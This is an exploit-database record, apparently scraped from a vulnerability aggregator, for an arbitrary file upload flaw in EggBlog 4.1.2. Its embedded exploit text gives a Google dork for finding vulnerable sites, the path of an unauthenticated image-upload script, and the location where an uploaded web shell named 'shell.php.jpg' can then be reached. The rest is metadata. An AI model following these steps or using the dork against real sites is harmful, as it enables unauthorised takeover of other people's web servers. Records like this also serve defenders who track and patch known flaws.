Description
EggBlog 4.1.2 - Arbitrary File Upload
{"id": "EXPLOITPACK:40FC0F45A9E7271AE24CDD58BD49D7E3", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "EggBlog 4.1.2 - Arbitrary File Upload", "description": "\nEggBlog 4.1.2 - Arbitrary File Upload", "published": "2013-05-01T00:00:00", "modified": "2013-05-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Pokk3rs", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:04:14", "viewCount": 7, "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "_state": {"dependencies": 1678960072, "score": 1684000228, "epss": 1678962009}, "_internal": {"score_hash": "546a3d91d5199c4a79fe0683127f83f5"}, "sourceData": "# Exploit Title: eggBlog Arbitrary File Upload Vulnerability\n# Google Dork:\"powered by eggBlog.net\"\n# Date: 28/04/2013\n# Exploit Author: Pokk3rs\n# Vendor Homepage: http://eggblog.net/\n# Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/\n# Tested on: Win8 Pro x64\n\n\n\nExpl0itation\n\n\n1 - Google Dork:\"powered by eggBlog.net\"\n\n\n2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=\n\n\n3 - http://server/[path]/photos/uploads/shell.php.jpg\n\n\n\n#", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "webapps", "platform": "php"}, "hackapp": {}, "toolHref": "", "w3af": {}}
{}